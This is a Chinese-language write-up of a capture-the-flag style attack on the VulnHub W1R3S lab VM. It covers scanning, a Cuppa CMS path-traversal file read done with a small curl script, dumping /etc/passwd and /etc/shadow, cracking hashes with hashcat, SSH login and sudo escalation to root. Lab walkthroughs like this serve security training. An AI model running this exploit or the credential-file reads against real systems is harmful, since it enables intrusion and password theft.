vulnhub靶机渗透[W1R3S-1-0-1]

Posted on Edited on In Views: Word count in article: 2.9k Reading time ≈ 10 mins.

发布日期

名称:W1R3S:1.0.1
发布日期:2018年2月5日

下载

  • Download: https://drive.google.com/file/d/1sWJRjku9uNWS0f_Jul24LCQ2ZLucSG4X/view?usp=sharing
  • Download (Mirror): https://download.vulnhub.com/w1r3s/w1r3s.v1.0.1.zip
  • Download (Torrent): https://download.vulnhub.com/w1r3s/w1r3s.v1.0.1.zip.torrent

描述

您已被雇用在W1R3S.inc单个服务器上进行渗透测试并报告所有发现。 他们要求您获得root用户访问权限并找到该flag(位于/root目录中)。
获得低特权的shell难度:初学者/中级
特权升级难度:初学者/中级
关于:这是个易受攻击的Ubuntu box,为您提供一些真实世界的场景,使我想起了OSCP实验室。
虚拟机:VMware Workstation

v1.0.0-2018年5月2日v1.0.1-2018年8月3日

信息收集

上nmap

1
2
3
4
root@kali:~# nmap -sn -v 192.168.66.0/24
Nmap scan report for 192.168.66.7
Host is up (0.00030s latency).
MAC Address: 00:0C:29:AA:7F:FC (VMware)
1
2
3
4
5
6
root@kali:~# nmap -sV -Pn -v -p- 192.168.66.7
PORT     STATE SERVICE VERSION
21/tcp   open  ftp     vsftpd 2.0.8 or later
22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
3306/tcp open  mysql   MySQL (unauthorized)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
root@kali:~# nmap -v -A -Pn -T5 -sV --script=vuln 192.168.66.7
PORT      STATE  SERVICE         VERSION
20/tcp    closed ftp-data
21/tcp    open   ftp             vsftpd 2.0.8 or later
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_sslv2-drown: 
22/tcp    open   ssh             OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
80/tcp    open   http            Apache httpd 2.4.18 ((Ubuntu))
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum: 
|_  /wordpress/wp-login.php: Wordpress login page.
|_http-server-header: Apache/2.4.18 (Ubuntu)
| http-slowloris-check: 
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|       
|     Disclosure date: 2009-09-17
|     References:
|       http://ha.ckers.org/slowloris/
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| vulners: 
|   cpe:/a:apache:http_server:2.4.18: 
|       CVE-2017-7679   7.5     https://vulners.com/cve/CVE-2017-7679
|       CVE-2017-7668   7.5     https://vulners.com/cve/CVE-2017-7668
|       CVE-2017-3169   7.5     https://vulners.com/cve/CVE-2017-3169
|       CVE-2017-3167   7.5     https://vulners.com/cve/CVE-2017-3167
|       CVE-2019-0211   7.2     https://vulners.com/cve/CVE-2019-0211
|       CVE-2018-1312   6.8     https://vulners.com/cve/CVE-2018-1312
|       CVE-2017-15715  6.8     https://vulners.com/cve/CVE-2017-15715
|       CVE-2019-10082  6.4     https://vulners.com/cve/CVE-2019-10082
|       CVE-2017-9788   6.4     https://vulners.com/cve/CVE-2017-9788
|       CVE-2019-0217   6.0     https://vulners.com/cve/CVE-2019-0217
|       CVE-2019-10098  5.8     https://vulners.com/cve/CVE-2019-10098
|       CVE-2019-0220   5.0     https://vulners.com/cve/CVE-2019-0220
|       CVE-2019-0196   5.0     https://vulners.com/cve/CVE-2019-0196
|       CVE-2018-17199  5.0     https://vulners.com/cve/CVE-2018-17199
|       CVE-2018-1333   5.0     https://vulners.com/cve/CVE-2018-1333
|       CVE-2017-9798   5.0     https://vulners.com/cve/CVE-2017-9798
|       CVE-2017-15710  5.0     https://vulners.com/cve/CVE-2017-15710
|       CVE-2016-8743   5.0     https://vulners.com/cve/CVE-2016-8743
|       CVE-2016-8740   5.0     https://vulners.com/cve/CVE-2016-8740
|       CVE-2016-4979   5.0     https://vulners.com/cve/CVE-2016-4979
|       CVE-2019-0197   4.9     https://vulners.com/cve/CVE-2019-0197
|       CVE-2019-10092  4.3     https://vulners.com/cve/CVE-2019-10092
|       CVE-2018-11763  4.3     https://vulners.com/cve/CVE-2018-11763
|       CVE-2016-4975   4.3     https://vulners.com/cve/CVE-2016-4975
|       CVE-2016-1546   4.3     https://vulners.com/cve/CVE-2016-1546
|       CVE-2018-1283   3.5     https://vulners.com/cve/CVE-2018-1283
|_      CVE-2016-8612   3.3     https://vulners.com/cve/CVE-2016-8612
990/tcp   closed ftps
3306/tcp  open   mysql           MySQL (unauthorized)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_mysql-vuln-cve2012-2122: ERROR: Script execution failed (use -d to debug)

目录爆破一波

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
root@kali:~# dirb http://192.168.66.7/

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Wed Jan  8 01:22:15 2020
URL_BASE: http://192.168.66.7/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.66.7/ ----
==> DIRECTORY: http://192.168.66.7/administrator/                                                     
+ http://192.168.66.7/index.html (CODE:200|SIZE:11321)                                                
==> DIRECTORY: http://192.168.66.7/javascript/                                                        
+ http://192.168.66.7/server-status (CODE:403|SIZE:277)                                               
==> DIRECTORY: http://192.168.66.7/wordpress/                                                         
                                                                                                      
---- Entering directory: http://192.168.66.7/administrator/ ----
==> DIRECTORY: http://192.168.66.7/administrator/alerts/                                              
==> DIRECTORY: http://192.168.66.7/administrator/api/                                                 
==> DIRECTORY: http://192.168.66.7/administrator/classes/                                             
==> DIRECTORY: http://192.168.66.7/administrator/components/                                          
==> DIRECTORY: http://192.168.66.7/administrator/extensions/                                          
+ http://192.168.66.7/administrator/index.php (CODE:302|SIZE:6946)                                    
==> DIRECTORY: http://192.168.66.7/administrator/installation/                                        
==> DIRECTORY: http://192.168.66.7/administrator/js/                                                  
==> DIRECTORY: http://192.168.66.7/administrator/language/                                            
==> DIRECTORY: http://192.168.66.7/administrator/media/                                               
+ http://192.168.66.7/administrator/robots.txt (CODE:200|SIZE:26)                                     
==> DIRECTORY: http://192.168.66.7/administrator/templates/                                           
                                                                                                      
---- Entering directory: http://192.168.66.7/javascript/ ----
==> DIRECTORY: http://192.168.66.7/javascript/jquery/                                                 
                                                                                                      
---- Entering directory: http://192.168.66.7/wordpress/ ----
+ http://192.168.66.7/wordpress/index.php (CODE:200|SIZE:55879)                                       
==> DIRECTORY: http://192.168.66.7/wordpress/wp-admin/                                                
==> DIRECTORY: http://192.168.66.7/wordpress/wp-content/                                              
==> DIRECTORY: http://192.168.66.7/wordpress/wp-includes/                                             
+ http://192.168.66.7/wordpress/xmlrpc.php (CODE:405|SIZE:42)                                         
                                                                                                      
---- Entering directory: http://192.168.66.7/administrator/alerts/ ----
+ http://192.168.66.7/administrator/alerts/index.html (CODE:200|SIZE:31)                              
                                                                                                      
---- Entering directory: http://192.168.66.7/administrator/api/ ----
==> DIRECTORY: http://192.168.66.7/administrator/api/administrator/                                   
+ http://192.168.66.7/administrator/api/index.php (CODE:200|SIZE:62)                                  
==> DIRECTORY: http://192.168.66.7/administrator/api/test/                                            
                                                                                                      
---- Entering directory: http://192.168.66.7/administrator/classes/ ----
==> DIRECTORY: http://192.168.66.7/administrator/classes/ajax/                                        
+ http://192.168.66.7/administrator/classes/index.html (CODE:200|SIZE:31)                             
                                                                                                      
---- Entering directory: http://192.168.66.7/administrator/components/ ----
==> DIRECTORY: http://192.168.66.7/administrator/components/configuration/                            
+ http://192.168.66.7/administrator/components/index.html (CODE:200|SIZE:31)                          
==> DIRECTORY: http://192.168.66.7/administrator/components/menu/                                     
==> DIRECTORY: http://192.168.66.7/administrator/components/stats/                                    
                                                                                                      
---- Entering directory: http://192.168.66.7/administrator/extensions/ ----
==> DIRECTORY: http://192.168.66.7/administrator/extensions/banners/                                  
==> DIRECTORY: http://192.168.66.7/administrator/extensions/content/                                  
+ http://192.168.66.7/administrator/extensions/index.html (CODE:200|SIZE:31)                          
                                                                                                      
---- Entering directory: http://192.168.66.7/administrator/installation/ ----
==> DIRECTORY: http://192.168.66.7/administrator/installation/html/                                   
+ http://192.168.66.7/administrator/installation/index.php (CODE:200|SIZE:4322)                       
                                                                                                      
---- Entering directory: http://192.168.66.7/administrator/js/ ----
==> DIRECTORY: http://192.168.66.7/administrator/js/filemanager/                                      
+ http://192.168.66.7/administrator/js/index.html (CODE:200|SIZE:31)                                  
==> DIRECTORY: http://192.168.66.7/administrator/js/jquery/                                           
==> DIRECTORY: http://192.168.66.7/administrator/js/tiny_mce/                                         
                                                                                                      
                                                                                                      
---- Entering directory: http://192.168.66.7/administrator/templates/ ----
==> DIRECTORY: http://192.168.66.7/administrator/templates/default/                                   
+ http://192.168.66.7/administrator/templates/index.html (CODE:200|SIZE:31)                           
                                                                                                      
---- Entering directory: http://192.168.66.7/javascript/jquery/ ----
+ http://192.168.66.7/javascript/jquery/jquery (CODE:200|SIZE:284394)                                 
                                                                                                      
---- Entering directory: http://192.168.66.7/wordpress/wp-admin/ ----
+ http://192.168.66.7/wordpress/wp-admin/admin.php (CODE:302|SIZE:0)                                  
==> DIRECTORY: http://192.168.66.7/wordpress/wp-admin/css/                                            
==> DIRECTORY: http://192.168.66.7/wordpress/wp-admin/images/                                         
==> DIRECTORY: http://192.168.66.7/wordpress/wp-admin/includes/                                       
+ http://192.168.66.7/wordpress/wp-admin/index.php (CODE:302|SIZE:0)                                  
==> DIRECTORY: http://192.168.66.7/wordpress/wp-admin/js/                                             
==> DIRECTORY: http://192.168.66.7/wordpress/wp-admin/maint/                                          
==> DIRECTORY: http://192.168.66.7/wordpress/wp-admin/network/                                        
==> DIRECTORY: http://192.168.66.7/wordpress/wp-admin/user/                                           
                                                                                                      
---- Entering directory: http://192.168.66.7/wordpress/wp-content/ ----
+ http://192.168.66.7/wordpress/wp-content/index.php (CODE:200|SIZE:0)                                
==> DIRECTORY: http://192.168.66.7/wordpress/wp-content/plugins/                                      
==> DIRECTORY: http://192.168.66.7/wordpress/wp-content/themes/                                       
==> DIRECTORY: http://192.168.66.7/wordpress/wp-content/upgrade/                                      
==> DIRECTORY: http://192.168.66.7/wordpress/wp-content/uploads/                                      
                                                                                                      
---- Entering directory: http://192.168.66.7/administrator/components/configuration/ ----
==> DIRECTORY: http://192.168.66.7/administrator/components/configuration/html/                       
+ http://192.168.66.7/administrator/components/configuration/index.php (CODE:200|SIZE:45)             
                                                                                                      
---- Entering directory: http://192.168.66.7/administrator/components/menu/ ----
==> DIRECTORY: http://192.168.66.7/administrator/components/menu/classes/                             
==> DIRECTORY: http://192.168.66.7/administrator/components/menu/html/                                
+ http://192.168.66.7/administrator/components/menu/index.php (CODE:200|SIZE:45)                      
                                                                                                      
---- Entering directory: http://192.168.66.7/administrator/components/stats/ ----
+ http://192.168.66.7/administrator/components/stats/index.php (CODE:200|SIZE:45)                                                                                                                                                                                                                                
---- Entering directory: http://192.168.66.7/administrator/templates/default/ ----
==> DIRECTORY: http://192.168.66.7/administrator/templates/default/classes/                           
==> DIRECTORY: http://192.168.66.7/administrator/templates/default/css/                               
==> DIRECTORY: http://192.168.66.7/administrator/templates/default/html/                              
==> DIRECTORY: http://192.168.66.7/administrator/templates/default/images/                            
+ http://192.168.66.7/administrator/templates/default/index.php (CODE:500|SIZE:0)                     
                                                                                                                                                                                                           
---- Entering directory: http://192.168.66.7/wordpress/wp-admin/network/ ----
+ http://192.168.66.7/wordpress/wp-admin/network/admin.php (CODE:302|SIZE:0)                          
+ http://192.168.66.7/wordpress/wp-admin/network/index.php (CODE:302|SIZE:0)                          
                                                                                                      
---- Entering directory: http://192.168.66.7/wordpress/wp-admin/user/ ----
+ http://192.168.66.7/wordpress/wp-admin/user/admin.php (CODE:302|SIZE:0)                             
+ http://192.168.66.7/wordpress/wp-admin/user/index.php (CODE:302|SIZE:0)                             
                                                                                                      
---- Entering directory: http://192.168.66.7/wordpress/wp-content/plugins/ ----
+ http://192.168.66.7/wordpress/wp-content/plugins/index.php (CODE:200|SIZE:0)                        
                                                                                                      
---- Entering directory: http://192.168.66.7/wordpress/wp-content/themes/ ----
+ http://192.168.66.7/wordpress/wp-content/themes/index.php (CODE:200|SIZE:0)

administrator目录原来是Cuppa CMS的安装设置。这是将浏览器指向/administrator时呈现出的页面。

根据官方文档,为了完成安装,必须首先创建数据库。

1
Remember, the database should be created before to install Cuppa CMS.

首先,Cuppa CMS安装未完成,否则将看不到设置页面。下载了Cuppa CMS代码的副本,以查看是否可以发现任何漏洞。不确定这是否是新漏洞,但在第77行的alertConfigField.php中找到一个LFI漏洞令人惊喜。

为了测试它,编写了cat.sh,一个简单的脚本,只要有权限,它就会显示任何文件。

1
2
3
4
5
6
7
8
9
10
11
12
#!/bin/bash

_HOST=192.168.66.7
_PATH=administrator/alerts/alertConfigField.php
_PARM=urlConfig
_TRAV=../../../../../../../..

curl -s --data-urlencode "${_PARM}=${_TRAV}$1" $_HOST/$_PATH \
| sed -r 's/^ {8}//' \
| sed '71,$!d' \
| sed '$d' \
| sed '$d'

运行脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
root@kali:~# ./cat.sh /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
messagebus:x:106:110::/var/run/dbus:/bin/false
uuidd:x:107:111::/run/uuidd:/bin/false
lightdm:x:108:114:Light Display Manager:/var/lib/lightdm:/bin/false
whoopsie:x:109:117::/nonexistent:/bin/false
avahi-autoipd:x:110:119:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
avahi:x:111:120:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
dnsmasq:x:112:65534:dnsmasq,,,:/var/lib/misc:/bin/false
colord:x:113:123:colord colour management daemon,,,:/var/lib/colord:/bin/false
speech-dispatcher:x:114:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false
hplip:x:115:7:HPLIP system user,,,:/var/run/hplip:/bin/false
kernoops:x:116:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false
pulse:x:117:124:PulseAudio daemon,,,:/var/run/pulse:/bin/false
rtkit:x:118:126:RealtimeKit,,,:/proc:/bin/false
saned:x:119:127::/var/lib/saned:/bin/false
usbmux:x:120:46:usbmux daemon,,,:/var/lib/usbmux:/bin/false
w1r3s:x:1000:1000:w1r3s,,,:/home/w1r3s:/bin/bash
sshd:x:121:65534::/var/run/sshd:/usr/sbin/nologin
ftp:x:122:129:ftp daemon,,,:/srv/ftp:/bin/false
mysql:x:123:130:MySQL Server,,,:/nonexistent:/bin/false
root@kali:~# ./cat.sh /etc/shadow
root:$6$vYcecPCy$JNbK.hr7HU72ifLxmjpIP9kTcx./ak2MM3lBs.Ouiu0mENav72TfQIs8h1jPm2rwRFqd87HDC0pi7gn9t7VgZ0:17554:0:99999:7:::
daemon:*:17379:0:99999:7:::
bin:*:17379:0:99999:7:::
sys:*:17379:0:99999:7:::
sync:*:17379:0:99999:7:::
games:*:17379:0:99999:7:::
man:*:17379:0:99999:7:::
lp:*:17379:0:99999:7:::
mail:*:17379:0:99999:7:::
news:*:17379:0:99999:7:::
uucp:*:17379:0:99999:7:::
proxy:*:17379:0:99999:7:::
www-data:$6$8JMxE7l0$yQ16jM..ZsFxpoGue8/0LBUnTas23zaOqg2Da47vmykGTANfutzM8MuFidtb0..Zk.TUKDoDAVRCoXiZAH.Ud1:17560:0:99999:7:::
backup:*:17379:0:99999:7:::
list:*:17379:0:99999:7:::
irc:*:17379:0:99999:7:::
gnats:*:17379:0:99999:7:::
nobody:*:17379:0:99999:7:::
systemd-timesync:*:17379:0:99999:7:::
systemd-network:*:17379:0:99999:7:::
systemd-resolve:*:17379:0:99999:7:::
systemd-bus-proxy:*:17379:0:99999:7:::
syslog:*:17379:0:99999:7:::
_apt:*:17379:0:99999:7:::
messagebus:*:17379:0:99999:7:::
uuidd:*:17379:0:99999:7:::
lightdm:*:17379:0:99999:7:::
whoopsie:*:17379:0:99999:7:::
avahi-autoipd:*:17379:0:99999:7:::
avahi:*:17379:0:99999:7:::
dnsmasq:*:17379:0:99999:7:::
colord:*:17379:0:99999:7:::
speech-dispatcher:!:17379:0:99999:7:::
hplip:*:17379:0:99999:7:::
kernoops:*:17379:0:99999:7:::
pulse:*:17379:0:99999:7:::
rtkit:*:17379:0:99999:7:::
saned:*:17379:0:99999:7:::
usbmux:*:17379:0:99999:7:::
w1r3s:$6$xe/eyoTx$gttdIYrxrstpJP97hWqttvc5cGzDNyMb0vSuppux4f2CcBv3FwOt2P1GFLjZdNqjwRuP3eUjkgb/io7x9q1iP.:17567:0:99999:7:::
sshd:*:17554:0:99999:7:::
ftp:*:17554:0:99999:7:::
mysql:!:17554:0:99999:7:::

可以看到/etc/shadow中有3个用户有密码hash,将hash值取出来放到hashcat中破解

1
2
3
$6$vYcecPCy$JNbK.hr7HU72ifLxmjpIP9kTcx./ak2MM3lBs.Ouiu0mENav72TfQIs8h1jPm2rwRFqd87HDC0pi7gn9t7VgZ0
$6$8JMxE7l0$yQ16jM..ZsFxpoGue8/0LBUnTas23zaOqg2Da47vmykGTANfutzM8MuFidtb0..Zk.TUKDoDAVRCoXiZAH.Ud1
$6$xe/eyoTx$gttdIYrxrstpJP97hWqttvc5cGzDNyMb0vSuppux4f2CcBv3FwOt2P1GFLjZdNqjwRuP3eUjkgb/io7x9q1iP.

没办法,电脑GPU强,hashcat加载rockyou.txt字典几分钟就把3个hash值破解完了。。。

3个hash值里面,只有一个hash被破解出来了。。。

1
2
D:\hashcat-5.1.0\hashcat-5.1.0>hashcat64.exe -m 1800 password.txt --show
$6$xe/eyoTx$gttdIYrxrstpJP97hWqttvc5cGzDNyMb0vSuppux4f2CcBv3FwOt2P1GFLjZdNqjwRuP3eUjkgb/io7x9q1iP.:computer

getshell

使用w1r3s/computer连接ssh

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
root@kali:~# ssh w1r3s@192.168.66.7
The authenticity of host '192.168.66.7 (192.168.66.7)' can't be established.
ECDSA key fingerprint is SHA256:/3N0PzPMqtXlj9QWJFMbCufh2W95JylZ/oF82NkAAto.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.66.7' (ECDSA) to the list of known hosts.
----------------------
Think this is the way?
----------------------
Well,........possibly.
----------------------
w1r3s@192.168.66.7's password: 
Welcome to Ubuntu 16.04.3 LTS (GNU/Linux 4.15.0-74-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

228 packages can be updated.
0 updates are security updates.
                                                                                   
.....You made it huh?....                                                          
Last login: Mon Jan 22 22:47:27 2018 from 192.168.0.35                             
w1r3s@W1R3S:~$ id                                                                           
uid=1000(w1r3s) gid=1000(w1r3s) groups=1000(w1r3s),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare)
w1r3s@W1R3S:~$ whoami
w1r3s

提权

看到w1r3s在sudoers列表中。

1
2
3
4
5
6
7
8
w1r3s@W1R3S:~$ sudo -l
[sudo] password for w1r3s: 
Matching Defaults entries for w1r3s on W1R3S.localdomain:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User w1r3s may run the following commands on W1R3S.localdomain:
    (ALL : ALL) ALL

直接提权拿到flag

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
w1r3s@W1R3S:~$ sudo /bin/bash
root@W1R3S:~# id
uid=0(root) gid=0(root) groups=0(root)
root@W1R3S:~# whoami
root
root@W1R3S:~# cd /root
root@W1R3S:/root# ls
flag.txt
root@W1R3S:/root# cat flag.txt 
-----------------------------------------------------------------------------------------
   ____ ___  _   _  ____ ____      _  _____ _   _ _        _  _____ ___ ___  _   _ ____  
  / ___/ _ \| \ | |/ ___|  _ \    / \|_   _| | | | |      / \|_   _|_ _/ _ \| \ | / ___| 
 | |  | | | |  \| | |  _| |_) |  / _ \ | | | | | | |     / _ \ | |  | | | | |  \| \___ \ 
 | |__| |_| | |\  | |_| |  _ <  / ___ \| | | |_| | |___ / ___ \| |  | | |_| | |\  |___) |
  \____\___/|_| \_|\____|_| \_\/_/   \_\_|  \___/|_____/_/   \_\_| |___\___/|_| \_|____/ 
                                                                                        
-----------------------------------------------------------------------------------------

                          .-----------------TTTT_-----_______
                        /''''''''''(______O] ----------____  \______/]_
     __...---'"""\_ --''   Q                               ___________@
 |'''                   ._   _______________=---------"""""""
 |                ..--''|   l L |_l   |
 |          ..--''      .  /-___j '   '
 |    ..--''           /  ,       '   '
 |--''                /           `    \
                      L__'         \    -
                                    -    '-.
                                     '.    /
                                       '-./

----------------------------------------------------------------------------------------
  YOU HAVE COMPLETED THE
               __      __  ______________________   _________
              /  \    /  \/_   \______   \_____  \ /   _____/
              \   \/\/   / |   ||       _/ _(__  < \_____  \ 
               \        /  |   ||    |   \/       \/        \
                \__/\  /   |___||____|_  /______  /_______  /.INC
                     \/                \/       \/        \/        CHALLENGE, V 1.0
----------------------------------------------------------------------------------------

CREATED BY SpecterWires

----------------------------------------------------------------------------------------

总结

  • 枚举目录的能力-此技能可以节省大量时间,因为在许多情况下,会发现有趣的路径充当入口点。
  • 能够搜索运行服务的漏洞-在这种情况下,设法通过一个简单的Google搜索就发现了CUPPA漏洞。利用漏洞数据库和Google之类的搜索引擎可以节省大量时间。

Game over

不好意思,这次还是没有找到希腊某位大佬的傻瓜式一键通关脚本,i am so sorry about this…It’s a pity…

The end,to be continue…